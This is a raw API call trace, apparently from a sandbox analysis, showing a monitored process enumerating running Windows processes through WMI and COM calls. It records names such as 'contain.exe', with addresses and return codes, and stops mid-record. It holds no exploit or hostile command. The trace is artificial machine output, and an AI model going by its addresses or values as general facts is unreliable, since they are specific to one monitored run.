WbemDefPath:IUnknown:QueryInterface (in: This=0x552a388, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.372] WbemDefPath:IUnknown:Release (This=0x552a388) returned 0x2 [0265.372] WbemDefPath:IUnknown:Release (This=0x552a388) returned 0x1 [0265.372] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a388, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a388) returned 0x0 [0265.372] WbemDefPath:IUnknown:AddRef (This=0x552a388) returned 0x3 [0265.372] WbemDefPath:IUnknown:Release (This=0x552a388) returned 0x2 [0265.372] WbemDefPath:IWbemPath:SetText (This=0x552a388, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4376\"") returned 0x0 [0265.372] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.372] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.372] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.372] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.372] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.372] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.372] IWbemClassObject:Get (in: This=0x552bd08, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e60a0*=0, plFlavor=0x23e60a4*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="size-defense-course.exe", varVal2=0x0), pType=0x23e60a0*=8, plFlavor=0x23e60a4*=0) returned 0x0 [0265.372] SysStringByteLen (bstr="size-defense-course.exe") returned 0x2e [0265.372] SysStringByteLen (bstr="size-defense-course.exe") returned 0x2e [0265.373] IWbemClassObject:Get (in: This=0x552bd08, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e60a0*=8, plFlavor=0x23e60a4*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="size-defense-course.exe", varVal2=0x0), pType=0x23e60a0*=8, plFlavor=0x23e60a4*=0) returned 0x0 [0265.374] SysStringByteLen (bstr="size-defense-course.exe") returned 0x2e [0265.374] SysStringByteLen (bstr="size-defense-course.exe") returned 0x2e [0265.375] CoTaskMemAlloc (cb=0x4) returned 0x54ba1d8 [0265.375] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba1d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba1d8*=0x552c9c8, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.375] IUnknown:QueryInterface (in: This=0x552c9c8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552c9c8) returned 0x0 [0265.375] IUnknown:QueryInterface (in: This=0x552c9c8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.375] IUnknown:QueryInterface (in: This=0x552c9c8, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.376] IUnknown:QueryInterface (in: This=0x552c9c8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.376] IUnknown:AddRef (This=0x552c9c8) returned 0x3 [0265.376] IUnknown:QueryInterface (in: This=0x552c9c8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.376] IUnknown:QueryInterface (in: This=0x552c9c8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.376] IUnknown:QueryInterface (in: This=0x552c9c8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552c9cc) returned 0x0 [0265.376] IMarshal:GetUnmarshalClass (in: This=0x552c9cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.376] IUnknown:Release (This=0x552c9cc) returned 0x3 [0265.376] IUnknown:QueryInterface (in: This=0x552c9c8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.376] IUnknown:Release (This=0x552c9c8) returned 0x2 [0265.376] IUnknown:QueryInterface (in: This=0x552c9c8, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552c9c8) returned 0x0 [0265.376] IUnknown:AddRef (This=0x552c9c8) returned 0x4 [0265.376] IUnknown:Release (This=0x552c9c8) returned 0x3 [0265.376] IUnknown:Release (This=0x552c9c8) returned 0x2 [0265.376] CoTaskMemFree (pv=0x54ba1d8) [0265.376] IUnknown:AddRef (This=0x552c9c8) returned 0x3 [0265.376] IWbemClassObject:Get (in: This=0x552c9c8, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.377] IWbemClassObject:Get (in: This=0x552c9c8, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4384\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.377] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4384\"") returned 0x5e [0265.377] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4384\"") returned 0x5e [0265.377] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.377] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.377] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.377] IUnknown:Release (This=0x601a94) returned 0x1 [0265.378] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.378] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a1c8) returned 0x0 [0265.378] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a1c8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a1c8) returned 0x0 [0265.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a1c8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a1c8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.378] WbemDefPath:IUnknown:AddRef (This=0x552a1c8) returned 0x3 [0265.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a1c8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a1c8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.379] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a1c8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5538050) returned 0x0 [0265.379] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5538050, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.379] WbemDefPath:IUnknown:Release (This=0x5538050) returned 0x3 [0265.379] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a1c8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.379] WbemDefPath:IUnknown:Release (This=0x552a1c8) returned 0x2 [0265.379] WbemDefPath:IUnknown:Release (This=0x552a1c8) returned 0x1 [0265.379] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a1c8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a1c8) returned 0x0 [0265.379] WbemDefPath:IUnknown:AddRef (This=0x552a1c8) returned 0x3 [0265.379] WbemDefPath:IUnknown:Release (This=0x552a1c8) returned 0x2 [0265.379] WbemDefPath:IWbemPath:SetText (This=0x552a1c8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4384\"") returned 0x0 [0265.379] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.379] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.379] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.379] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.379] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.379] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.379] IWbemClassObject:Get (in: This=0x552c9c8, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e695c*=0, plFlavor=0x23e6960*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="contain.exe", varVal2=0x0), pType=0x23e695c*=8, plFlavor=0x23e6960*=0) returned 0x0 [0265.380] SysStringByteLen (bstr="contain.exe") returned 0x16 [0265.380] SysStringByteLen (bstr="contain.exe") returned 0x16 [0265.380] IWbemClassObject:Get (in: This=0x552c9c8, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e695c*=8, plFlavor=0x23e6960*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="contain.exe", varVal2=0x0), pType=0x23e695c*=8, plFlavor=0x23e6960*=0) returned 0x0 [0265.380] SysStringByteLen (bstr="contain.exe") returned 0x16 [0265.380] SysStringByteLen (bstr="contain.exe") returned 0x16 [0265.380] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.380] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x552cb60, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.381] IUnknown:QueryInterface (in: This=0x552cb60, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552cb60) returned 0x0 [0265.381] IUnknown:QueryInterface (in: This=0x552cb60, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.381] IUnknown:QueryInterface (in: This=0x552cb60, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.381] IUnknown:QueryInterface (in: This=0x552cb60, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.381] IUnknown:AddRef (This=0x552cb60) returned 0x3 [0265.381] IUnknown:QueryInterface (in: This=0x552cb60, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.381] IUnknown:QueryInterface (in: This=0x552cb60, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.381] IUnknown:QueryInterface (in: This=0x552cb60, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552cb64) returned 0x0 [0265.381] IMarshal:GetUnmarshalClass (in: This=0x552cb64, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.381] IUnknown:Release (This=0x552cb64) returned 0x3 [0265.382] IUnknown:QueryInterface (in: This=0x552cb60, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.382] IUnknown:Release (This=0x552cb60) returned 0x2 [0265.382] IUnknown:QueryInterface (in: This=0x552cb60, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552cb60) returned 0x0 [0265.382] IUnknown:AddRef (This=0x552cb60) returned 0x4 [0265.382] IUnknown:Release (This=0x552cb60) returned 0x3 [0265.382] IUnknown:Release (This=0x552cb60) returned 0x2 [0265.382] CoTaskMemFree (pv=0x54ba2d8) [0265.382] IUnknown:AddRef (This=0x552cb60) returned 0x3 [0265.382] IWbemClassObject:Get (in: This=0x552cb60, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.382] IWbemClassObject:Get (in: This=0x552cb60, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4392\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.382] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4392\"") returned 0x5e [0265.382] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4392\"") returned 0x5e [0265.382] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.382] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.382] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.382] IUnknown:Release (This=0x601a94) returned 0x1 [0265.383] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba398) returned 0x0 [0265.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba398, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.384] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba398, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5529d68) returned 0x0 [0265.384] WbemDefPath:IUnknown:Release (This=0x54ba398) returned 0x0 [0265.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529d68, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5529d68) returned 0x0 [0265.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529d68, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529d68, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.384] WbemDefPath:IUnknown:AddRef (This=0x5529d68) returned 0x3 [0265.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529d68, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529d68, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.384] WbemDefPath:IUnknown:QueryInterface (in: 